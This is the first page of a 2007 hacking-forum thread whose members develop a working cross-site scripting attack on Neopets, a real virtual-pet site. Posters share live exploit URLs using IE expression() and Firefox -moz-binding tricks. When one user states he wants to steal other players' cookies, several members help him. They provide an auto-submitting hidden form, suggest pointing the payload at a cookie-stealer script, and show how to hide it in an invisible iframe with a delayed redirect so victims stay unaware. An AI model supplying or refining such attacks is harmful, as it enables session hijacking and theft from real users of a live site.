Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
Neopets?
Date: January 17, 2007 09:03PM

I heard it's really really hard to find a vulnerability in Neopet's and it's very wanted incase you guys don't know.

Try to look for one? It's appreciated, thanks.

Options: ReplyQuote
Re: Neopets?
Posted by: rsnake
Date: January 17, 2007 09:50PM

What is neopets, why is it hard and why is it wanted? Clearly, it's new to me, at least.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Neopets?
Date: January 17, 2007 10:00PM

http:/www.neopets.com

Online virtual pet site, it has over 1.5 million players and the currency has value.

Looks please ^_^

Options: ReplyQuote
Re: Neopets?
Posted by: Kyran
Date: January 17, 2007 10:09PM

They seem to cut out all echoed tags. I found a few pages where I can break out, but I can't inject anything. This was just a quick look mind you. I'll take a look at it again in the morning.

- Kyran

Options: ReplyQuote
Re: Neopets?
Posted by: rsnake
Date: January 17, 2007 10:46PM

This will spin your browser out of control and only works in Internet Explorer, but it does work: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.neopets.com/search.phtml?q=%22+style%3Dxx%3Aexpression%28alert%281%29%29%3E&client=pub-9208792519293771&forid=1&ie=ISO-8859-1&oe=ISO-8859-1&safe=active&domains=www.neopets.com&cof=GALT%3A%23FFFFFF%3BGL%3A1%3BDIV%3A%23000066%3BVLC%3AFFFFFF%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A000066%3BALC%3AFFFFFF%3BLC%3AFFFFFF%3BT%3A000000%3BGFNT%3A000066%3BGIMP%3A000077%3BFORID%3A1&hl=en&s=%22+style%3Dxx%3Aexpression%28alert%28String.fromCharCode(88,83,83)%29%29%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Neopets?
Posted by: id
Date: January 17, 2007 11:18PM

I hope your plan is to deface it forever, I got nauseous looking at that.

-id

Options: ReplyQuote
Re: Neopets?
Posted by: hasse
Date: January 18, 2007 06:55AM

This works in Firefox:
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.neopets.com/search.phtml?q=Z&client=pub-9208792519293771&forid=1&ie=ISO-8859-1&oe=ISO-8859-1&safe=active&domains=www.neopets.com&cof=GALT%3A%23FFFFFF%3BGL%3A1%3BDIV%3A%23000066%3BVLC%3AFFFFFF%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A000066%3BALC%3AFFFFFF%3BLC%3AFFFFFF%3BT%3A000000%3BGFNT%3A000066%3BGIMP%3A000077%3BFORID%3A1&hl=en&s=%22+style%3D-moz-binding:url(//ha.ckers.org/xssmoz.xml%23xss%29

Thanks to maluc who showed me how in the thread about defenselink.



Edited 1 time(s). Last edit at 01/18/2007 06:59AM by hasse.

Options: ReplyQuote
Re: Neopets?
Date: January 18, 2007 12:33PM

Now how would I go about linking that to my php cookie script and spreading the link around so I can embed it onto pages thus stealing other cookies?

Options: ReplyQuote
Re: Neopets?
Posted by: eyeced
Date: January 18, 2007 12:55PM

<form method='post' name='xss' action='http://www.neopets.com/search.phtml?q=Z'>
client:<input input="text" value="pub-9208792519293771" name="client" style="width:0%" /><br />
forid:<input input="text" value="1" name="forid" style="width:0%" /><br />
ie:<input input="text" value="ISO-8859-1" name="ie" style="width:0%" /><br />
oe:<input input="text" value="ISO-8859-1" name="oe" style="width:0%" /><br />
safe:<input input="text" value="active" name="safe" style="width:0%" /><br />
domains:<input input="text" value="www.neopets.com" name="domains" style="width:0%" /><br />
cof:<input input="text" value="GALT:#FFFFFF;GL:1;DIV:#000066;VLC:FFFFFF;AH:center;BGC:FFFFFF;LBGC:000066;ALC:FFFFFF;LC:FFFFFF;T:000000;GFNT:000066;GIMP:000077;FORID:1" name="cof" style="width:0%" /><br />
hl:<input input="text" value="en" name="hl" style="width:0%" /><br />
s:<input input="text" value="&quot; style=-moz-binding:url(//ha.ckers.org/xssmoz.xml#xss)" name="s" style="width:0%" /><br />
<br />
</form>
<script>
document.xss.submit()
</script>

Where the binding:url() linking to an xml file on your server instead of containing

<constructor>alert('XSS')</constructor>

it would contain a window.location = to your cookie stealer script. I havent been on neo pets but this code above automatically submits the xss, its only a slight modification from the white acid post forwarder, any way if you could get an <img src="thexsshtmlfile"></img> on the forums then this is sure to work.

Options: ReplyQuote
Re: Neopets?
Date: January 18, 2007 01:22PM

Where do I put all the...

<form method='post' name='xss' action='http://www.neopets.com/search.phtml?q=Z'>
client:<input input="text" value="pub-9208792519293771" name="client" style="width:0%" /><br />
forid:<input input="text" value="1" name="forid" style="width:0%" /><br />
ie:<input input="text" value="ISO-8859-1" name="ie" style="width:0%" /><br />
oe:<input input="text" value="ISO-8859-1" name="oe" style="width:0%" /><br />
safe:<input input="text" value="active" name="safe" style="width:0%" /><br />
domains:<input input="text" value="www.neopets.com" name="domains" style="width:0%" /><br />
cof:<input input="text" value="GALT:#FFFFFF;GL:1;DIV:#000066;VLC:FFFFFF;AH:center;BGC:FFFFFF;LBGC:000066;ALC:FFFFFF;LC:FFFFFF;T:000000;GFNT:000066;GIMP:000077;FORID:1" name="cof" style="width:0%" /><br />
hl:<input input="text" value="en" name="hl" style="width:0%" /><br />
s:<input input="text" value="&quot; style=-moz-binding:url(//ha.ckers.org/xssmoz.xml#xss)" name="s" style="width:0%" /><br />
<br />
</form>

stuff?

Options: ReplyQuote
Re: Neopets?
Posted by: hasse
Date: January 18, 2007 01:24PM

eyeced Wrote:
-------------------------------------------------------


> it would contain a window.location = to your cookie stealer script. I havent been on neo pets
> but this code above automatically submits the xss, its only a slight modification from the
> white acid post forwarder, any way if you could get an <img src="thexsshtmlfile"></img>
> on the forums then this is sure to work.

No I don't think that would work. If you put the page in an image-tag it would just try to get that page, I don't think it will read it and execute the javascript on it and post the data.

So you'd have to make the user visit your special page, maybe hide it in an iframe or something like that.



Edited 1 time(s). Last edit at 01/18/2007 01:25PM by hasse.

Options: ReplyQuote
Re: Neopets?
Posted by: hasse
Date: January 18, 2007 01:26PM

robertanderson Wrote:
-------------------------------------------------------
> Where do I put all the...
> ...
> stuff?

Copy the code from the box in the whiteacid-page and put that in a page of your own.

Options: ReplyQuote
Re: Neopets?
Date: January 18, 2007 01:52PM

...



Edited 1 time(s). Last edit at 02/12/2007 09:53PM by robertanderson.

Options: ReplyQuote
Re: Neopets?
Posted by: hasse
Date: January 18, 2007 02:33PM

robertanderson Wrote:
-------------------------------------------------------
> Why doesn't this work?
>
>

Well first of all http://padora.phpnet.us/funny.xml isn't laid out like http://ha.ckers.org/xssmoz.xml. And secondly I believe the "#xss"-part is necessary.

Options: ReplyQuote
Re: Neopets?
Date: January 18, 2007 02:39PM

Ok I fixed it now and it's still not working...

My script on php page...



Edited 1 time(s). Last edit at 01/18/2007 03:03PM by robertanderson.

Options: ReplyQuote
Re: Neopets?
Posted by: WhiteAcid
Date: January 18, 2007 02:59PM

The link that maluc posted (http://preview.tinyurl.com/3d27my <-- safe preview-style link) creates the following code:
<form method='post' action='http://www.neopets.com/search.phtml?q=Z'>
	client:<input input="text" value="pub-9208792519293771" name="client" style="width:80%" /><br />
	forid:<input input="text" value="1" name="forid" style="width:80%" /><br />
	ie:<input input="text" value="ISO-8859-1" name="ie" style="width:80%" /><br />
	oe:<input input="text" value="ISO-8859-1" name="oe" style="width:80%" /><br />
	safe:<input input="text" value="active" name="safe" style="width:80%" /><br />
	domains:<input input="text" value="www.neopets.com" name="domains" style="width:80%" /><br />
	cof:<input input="text" value="GALT:#FFFFFF;GL:1;DIV:#000066;VLC:FFFFFF;AH:center;BGC:FFFFFF;LBGC:000066;ALC:FFFFFF;LC:FFFFFF;T:000000;GFNT:000066;GIMP:000077;FORID:1" name="cof" style="width:80%" /><br />
	hl:<input input="text" value="en" name="hl" style="width:80%" /><br />
	s:<input input="text" value="&quot; style=-moz-binding:url(//ha.ckers.org/xssmoz.xml#xss)" name="s" style="width:80%" /><br />
	<input type='submit' value='submit' /><br />
</form>
<script>
document.forms[0].submit()
</script>
That code works fine.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 01/18/2007 03:00PM by WhiteAcid.

Options: ReplyQuote
Re: Neopets?
Posted by: hasse
Date: January 18, 2007 02:59PM

robertanderson Wrote:
-------------------------------------------------------
> Ok I fixed it now and it's still not working...

Your xml-file still doesn't match the ha.ckers one. Compare the source code of the two files

Options: ReplyQuote
Re: Neopets?
Date: January 18, 2007 07:33PM

Thanks a lot guys, I got that working.

I was able to put the cg script into an iFrame, I was wondering if I could put the POST action in an iFrame so the user doesn't see it?

Because how it is it comes up as...

ERROR : Sorry, nothing with the name '" style=-moz-binding:url(//XXXXX.XXXXXX.us/daxml.xml#xss)' exists. Please try again!

People will see my site url then, which I don't want.



Edited 1 time(s). Last edit at 01/18/2007 07:45PM by robertanderson.

Options: ReplyQuote
Re: Neopets?
Posted by: hasse
Date: January 18, 2007 07:59PM

robertanderson Wrote:
-------------------------------------------------------
> Thanks a lot guys, I got that working.
>
> I was able to put the cg script into an iFrame, I
> was wondering if I could put the POST action in an
> iFrame so the user doesn't see it?
>
> Because how it is it comes up as...
>
> ERROR : Sorry, nothing with the name '"
> style=-moz-binding:url(//XXXXX.XXXXXX.us/daxml.xml
> #xss)' exists. Please try again!
>
> People will see my site url then, which I don't
> want.

Just put all the code you got from Whiteacid's page in an iframe.

Options: ReplyQuote
Re: Neopets?
Date: January 18, 2007 08:24PM

<iframe>

code

</iframe>

Like that? lol

Options: ReplyQuote
Re: Neopets?
Posted by: hasse
Date: January 18, 2007 08:37PM

robertanderson Wrote:
-------------------------------------------------------
> >
> code
>
>
>
> Like that? lol


No, add it to another page in an iframe.

<iframe src="xss_post_page.html" style="width:0px;height:0px;border:0px"></iframe>

Options: ReplyQuote
Re: Neopets?
Date: January 18, 2007 09:09PM

Ohhh how cool, thanks!

Quick question, one...do you have aim or msn?

two...

I'm trying to do

<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>
<script>
location.href="http://www.google.com"
</script>

So it does the xss script and then goes to google...but it seems like it just goes to google and forgets about the iframe. When I remove the google redirection it works though so I'm confused :P

Options: ReplyQuote
Re: Neopets?
Posted by: hasse
Date: January 18, 2007 09:17PM

robertanderson Wrote:
-------------------------------------------------------
> Ohhh how cool, thanks!
>
> Quick question, one...do you have aim or msn?

No unfortunately I don't.

> two...
>
> I'm trying to do
>
>
>
> location.href="http://www.google.com"
>
>
> So it does the xss script and then goes to
> google...but it seems like it just goes to google
> and forgets about the iframe. When I remove the
> google redirection it works though so I'm confused
> :P

I think it redirects too quickly, the XSS-page doesn't have enough time to load and send it's data.



Edited 2 time(s). Last edit at 01/18/2007 09:18PM by hasse.

Options: ReplyQuote
Re: Neopets?
Posted by: rsnake
Date: January 18, 2007 09:20PM

It doesn't have time to load the iframe. Make your script wait a few seconds (or however long it takes for the user to see it) before running the location.href and that should work.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Neopets?
Date: January 18, 2007 09:21PM

So what do I do?

<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>
<script>
location.href="http://www.google.com"
</script>

I was thinking something involving settimeout...can't figure out the quotation marks though they seem different in JS.

Options: ReplyQuote
Re: Neopets?
Posted by: rsnake
Date: January 18, 2007 09:23PM

This function should do the trick:

function pause(millisecond)
{
var now = new Date();
var exitTime = now.getTime() + millisecond;

while(true)
{
now = new Date();
if(now.getTime() > exitTime) return;
}
}

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Neopets?
Posted by: hasse
Date: January 18, 2007 09:41PM

rsnake Wrote:
-------------------------------------------------------
> This function should do the trick:
>
> function pause(millisecond)
> {
> var now = new Date();
> var exitTime = now.getTime() + millisecond;
>
> while(true)
> {
> now = new Date();
> if(now.getTime() > exitTime) return;
> }
> }

Maybe an alternative would be to use "meta refresh". Or just leaving the site with some amusing image on it without a redirect. Depending on what's less suspicious.


I wonder how many people disable javascript. Maybe it's a good idea to use a flash-file to do it instead/also?



Edited 2 time(s). Last edit at 01/18/2007 09:43PM by hasse.

Options: ReplyQuote
Re: Neopets?
Date: January 18, 2007 09:52PM

Thanks for trying but this time when i enter the url it waits 2 seconds then again goes straight to google.

Here's my current code...

<iframe src="xssscript.php" style="width:0px;height:0px;border:0px"></iframe>
<script>
pause(2000)
location.href="http://www.google.com"

function pause(millisecond)
{
var now = new Date();
var exitTime = now.getTime() + millisecond;

while(true)
{
now = new Date();
if(now.getTime() > exitTime) return;
}
}

</script>

Options: ReplyQuote
Re: Neopets?
Posted by: hasse
Date: January 18, 2007 10:36PM

robertanderson Wrote:
-------------------------------------------------------
> Thanks for trying but this time when i enter the
> url it waits 2 seconds then again goes straight to
> google.
>
> Here's my current code...
>

You could try the "meta refresh"-tag:
<meta http-equiv="Refresh" content="4;url=http://www.domain.com/link.html">

Options: ReplyQuote
Re: Neopets?
Posted by: Spikeman
Date: January 19, 2007 01:52AM

robertanderson Wrote:
-------------------------------------------------------
> So what do I do?
>
>
>
> location.href="http://www.google.com"
>
>
> I was thinking something involving
> settimeout...can't figure out the quotation marks
> though they seem different in JS.


Put the location.href in the iframe's onload.

<iframe src="xssscript.php" style="width:0px;height:0px;border:0px;display:none" onload="location.href='http://neopets.justgotowned.com'"></iframe>

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.